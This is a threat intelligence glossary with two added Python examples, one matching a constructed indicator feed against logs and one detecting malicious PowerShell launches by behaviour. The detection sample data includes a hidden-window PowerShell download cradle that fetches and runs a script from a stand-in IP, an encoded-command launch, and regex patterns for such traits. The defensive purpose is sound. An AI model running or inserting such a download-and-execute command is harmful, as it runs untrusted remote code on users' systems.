Threat Intelligence Glossary
What is Actionable Threat Intelligence?
Actionable threat intelligence is evidence-based knowledge used to make informed decisions about how to respond to specific threats. It includes context, mechanisms, indicators, implications, and action-oriented advice about those threats.
Raw data becomes actionable threat intelligence only after it has been collected, normalized, enriched with context, and filtered for relevance to the organization that will consume it. That tailoring is what lets security teams mitigate the risks that apply to them and disrupt attacks in progress.
What are Open Source Threat Intelligence Feeds?
Open source threat intelligence (OSINT) feeds are threat intelligence data sources that anyone can access, online or offline. Organizations and individuals alike publish them.
Online OSINT feeds are hosted on publicly accessible websites. Some require registration, but most do not; signing up usually adds the benefit of an email notification each time the feed is updated. Offline OSINT feeds reach subscribers as printed newsletters, security conference and training handouts, or threat reports. This definition focuses on Internet-accessible OSINT feeds.
You can compare OSINT feeds to the news, social media, or newsletter feeds you receive daily: a continuous stream of updates whose reliability depends on who publishes it. Because anyone can publish an OSINT feed, its indicators should be validated and aged out over time rather than blocked on blindly.
What is Operational Threat Intelligence?
Operational threat intelligence is actionable information about specific, imminent attacks or campaigns. It describes the nature of the attack, identifies who is responsible for it, and indicates when and how it is expected to affect an organization.
Security operations and incident response staff are its primary consumers, using it to prioritize monitoring and defenses against the campaigns most likely to reach them. Business unit managers and executives also draw on it to plan and adjust protective measures against the attacks that may affect them.
What is Strategic Threat Intelligence?
Strategic threat intelligence gives its users a high-level view of their organization’s cybersecurity posture, of threats and their potential business impact, and of attack trends relevant to their industry. Senior executives such as chief information security officers (CISOs) are its usual consumers.
Strategic threat intelligence helps executives manage known cyber risks and anticipate and mitigate risks that are not yet visible to them.
What is Technical Threat Intelligence?
Technical threat intelligence refers to the indicators of compromise (IoCs) that cybersecurity staff use to protect their networks. It includes command-and-control (C2, also written C&C) channels, tools (malware and exploits), IP addresses, domains, file hashes, malicious emails, and other artifacts that threat actors use to breach a target system or network. It is one subtype of cyber threat intelligence, not a synonym for the whole discipline.
Compared with strategic and tactical threat intelligence, technical intelligence is meant for short-term use: attackers rotate IP addresses, domains, and malware builds quickly, so indicators lose value within days or weeks and should be aged out of block lists. Operational threat intelligence is also short-lived, but it describes an attack or campaign as a whole, whereas technical threat intelligence consists of specific, machine-matchable values.
What are Threat Intelligence Feeds?
Threat intelligence feeds are continuous streams of data relevant to an organization’s security. They help companies stay on top of potential and existing threats by providing information about cyber attacks, suspicious activity, and global cybercrime trends. The data is collected from sources such as honeypots, network sensors, malware sandboxes, and analyst research, and is increasingly processed with machine learning to classify and prioritize it.
Threat intelligence feeds inform organizations about indicators of compromise (IoCs), the artifacts observed on a host or network that suggest it has been compromised. They also help identify threat actor tactics, techniques, and procedures (TTPs), which encompass the strategies and processes cybercriminals follow in carrying out an attack.
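As an added example (not code from the original page), the following Python script shows what ingesting a feed of technical indicators involves in practice, tying together the OSINT feed, technical threat intelligence, and threat intelligence feed entries above: it parses a constructed plain-text feed, normalizes each indicator (IP address, domain, or SHA-256 hash), ages out indicators older than a chosen shelf life, and matches the remaining ones against constructed log lines. The feed format, the indicator values, the hash, the log lines, and the 30-day expiry window are all assumptions made for this example, not properties of any real feed.

```python
"""Added example: ingest a plain-text IoC feed, age out stale indicators, and
match the live ones against log lines. Feed, hash and logs are constructed."""
import ipaddress
import re
from datetime import date, timedelta

# Constructed sample feed in the common "one indicator per line, # comments" style.
SAMPLE_FEED = """\
# constructed sample feed; format: <indicator> ; <first_seen YYYY-MM-DD>
198.51.100.23 ; 2024-05-01
203.0.113.77 ; 2024-03-02
bad-updates.example ; 2024-05-03
Mail.Phish.Example ; 2024-02-10
deadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef ; 2024-04-28
not an indicator ; 2024-05-01
"""

# Constructed log lines from a proxy, a DNS resolver and an EDR agent.
SAMPLE_LOGS = [
    "2024-05-10T08:01:02Z proxy src=10.0.0.5 dst=198.51.100.23 host=cdn.example.org",
    "2024-05-10T08:02:11Z dns query=mail.phish.example client=10.0.0.9",
    "2024-05-10T08:03:45Z edr host=WS-07 sha256=" + "DEADBEEF" * 8,
    "2024-05-10T08:04:00Z proxy src=10.0.0.5 dst=203.0.113.77 host=old.example",
    "2024-05-10T08:05:30Z dns query=BAD-UPDATES.EXAMPLE. client=10.0.0.12",
]
SAMPLE_TODAY = date(2024, 5, 10)  # assumed "current" date for the expiry check

SHA256_RE = re.compile(r"^[0-9a-fA-F]{64}$")
DOMAIN_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{2,63}$"
)
TOKEN_RE = re.compile(r"[=\s,;\"']+")  # splits key=value log syntax into tokens


def classify(token):
    """Return (type, normalized value) for an IP, domain or SHA-256, else None."""
    token = token.strip().rstrip(".")  # tolerate trailing-dot FQDNs
    try:
        ip = ipaddress.ip_address(token)
        return f"ipv{ip.version}", str(ip)
    except ValueError:
        pass
    if SHA256_RE.match(token):
        return "sha256", token.lower()
    if DOMAIN_RE.match(token):
        return "domain", token.lower()
    return None


def parse_feed(text):
    """Parse feed lines into indicator records, skipping comments and junk."""
    indicators = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        value, _, seen = line.partition(";")
        kind = classify(value)
        if kind is None:
            continue  # never let an unparseable line become a block-list entry
        try:
            first_seen = date.fromisoformat(seen.strip())
        except ValueError:
            continue  # no usable date means no way to expire it later
        indicators.append({"type": kind[0], "value": kind[1], "first_seen": first_seen})
    return indicators


def active_indicators(indicators, today, max_age_days=30):
    """Technical IoCs go stale fast: keep only those seen within max_age_days."""
    cutoff = today - timedelta(days=max_age_days)
    return {i["value"]: i for i in indicators if i["first_seen"] >= cutoff}


def match_logs(log_lines, active):
    """Return (log line, indicator) pairs for every token that hits a live IoC."""
    hits = []
    for line in log_lines:
        for token in TOKEN_RE.split(line):
            kind = classify(token)
            if kind and kind[1] in active:
                hits.append((line, active[kind[1]]))
    return hits


def run_example(today=SAMPLE_TODAY, max_age_days=30):
    """Parse the sample feed and return the hits found in the sample logs."""
    active = active_indicators(parse_feed(SAMPLE_FEED), today, max_age_days)
    return match_logs(SAMPLE_LOGS, active)


if __name__ == "__main__":
    for line, ioc in run_example():
        print(f"{ioc['type']:7} {ioc['value']}  <-  {line}")
```

Two details matter more than the matching itself: junk lines in the feed are skipped rather than loaded, because a sloppy or poisoned public feed should not be able to put arbitrary strings on a block list, and every indicator carries a first-seen date so that stale entries (the expired IP address and domain in the sample) stop generating alerts. With the sample data, only the recent IP address, the hash, and the mixed-case, trailing-dot domain produce hits.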
What is the Threat Intelligence Lifecycle?
The threat intelligence lifecycle is the framework that turns raw data into finished intelligence in a repeatable way, so that an organization can plan and implement security measures more efficiently and effectively and build defenses against emerging risks and threats.
In sum, the threat intelligence lifecycle guides intelligence teams in running an effective threat intelligence program. It comprises six phases: direction (setting intelligence requirements), collection, processing, analysis, dissemination, and feedback, with the feedback phase refining the direction of the next cycle.
What is a TTP?
TTP, short for “tactics, techniques, and procedures,” describes the patterns in how a particular threat actor or group carries out its attacks: tactics are the adversary’s goals (such as gaining initial access or persisting on a host), techniques are the methods used to achieve them, and procedures are the specific implementations observed. Analyzing TTPs supports counterintelligence and security operations because it describes how threat actors perform attacks; and because an adversary can change TTPs far less easily than IP addresses, domains, or file hashes, detections built on them stay useful longer than those built on individual indicators.
Think of TTPs as the modus operandi of a particular criminal gang: the way it carries out all of its crimes, its trademark, so to speak.
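To make the contrast with indicator matching concrete, here is an added example (not from the original page) of a TTP-based detection written in Python. It runs two behavioural rules over constructed process-creation events: an Office application spawning a script host, and a script host launched with an encoded command, a hidden window, or a download cradle. The two malicious events below are written as if from unrelated campaigns with different command lines, delivery methods, and infrastructure; both trigger because the rules key on behaviour rather than on any specific indicator. The event fields, host names, paths, and command lines are constructed for this example; the ATT&CK technique IDs in the comments are the standard ones, while the rule logic is this example’s own.

```python
"""Added example: TTP-based detection over constructed process-creation events.
Rules key on parent/child relationships and invocation shape, not on any
specific hash, domain or address, so unrelated campaigns still trigger them."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record (the fields an EDR or Sysmon event carries)."""
    ts: str
    host: str
    parent_image: str
    image: str
    command_line: str


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line traits common in malicious script-host invocations (assumed set).
SUSPICIOUS_ARGS = [
    ("encoded command", re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}")),
    ("hidden window", re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden")),
    ("download cradle", re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|invoke-expression|\biex\b")),
]

OFFICE_DIR = r"C:\Program Files\Microsoft Office\root\Office16"
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed events: two unrelated "campaigns" plus two benign PowerShell launches.
# The base64 blob and the URL are made up for this example.
SAMPLE_EVENTS = [
    ProcessEvent("2024-05-10T09:12:01Z", "ws-11", OFFICE_DIR + r"\WINWORD.EXE", PS_PATH,
                 "powershell.exe -nop -w hidden -enc SQBFAFgAIABOAGUAdwAtAE8AYgBqAGUAYwB0AA=="),
    ProcessEvent("2024-05-10T11:40:27Z", "ws-42", OFFICE_DIR + r"\EXCEL.EXE", PS_PATH,
                 "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://203.0.113.9/a.ps1')\""),
    ProcessEvent("2024-05-10T12:03:09Z", "ws-11", r"C:\Windows\explorer.exe", PS_PATH,
                 "powershell.exe Get-ChildItem C:\\Users"),
    ProcessEvent("2024-05-10T02:00:00Z", "srv-01", r"C:\Windows\System32\services.exe", PS_PATH,
                 "powershell.exe -NonInteractive -File C:\\scripts\\backup.ps1"),
]


def basename(path):
    """Case-insensitive file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(events):
    """Return one alert per rule hit; an event can trigger more than one rule."""
    alerts = []
    for ev in events:
        parent, child, cmd = basename(ev.parent_image), basename(ev.image), ev.command_line
        # Rule 1: an Office application spawning a script host (ATT&CK T1204.002,
        # User Execution: Malicious File). Keys on the parent/child pair only.
        if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
            alerts.append({"event": ev, "rule": "office_spawns_script_host",
                           "technique": "T1204.002", "severity": "high",
                           "reasons": [f"{parent} -> {child}"]})
        # Rule 2: a script host launched with evasion or download traits
        # (ATT&CK T1059, Command and Scripting Interpreter). Keys on invocation shape.
        if child in SCRIPT_HOSTS:
            reasons = [name for name, rx in SUSPICIOUS_ARGS if rx.search(cmd)]
            if reasons:
                alerts.append({"event": ev, "rule": "suspicious_script_host_args",
                               "technique": "T1059", "severity": "medium", "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a['severity']:6} {a['technique']:10} {a['event'].host:7} {a['rule']}: {a['reasons']}")
```

The benign events show why the rules are written this way: an interactive PowerShell session under explorer.exe and a scheduled backup script under services.exe both run the same binary as the malicious events but neither has an Office parent nor the evasion traits, so they produce no alerts. Swapping the payload hash or the download host in either malicious event would not change the result, which is the durability advantage TTP-based detections have over indicator lists.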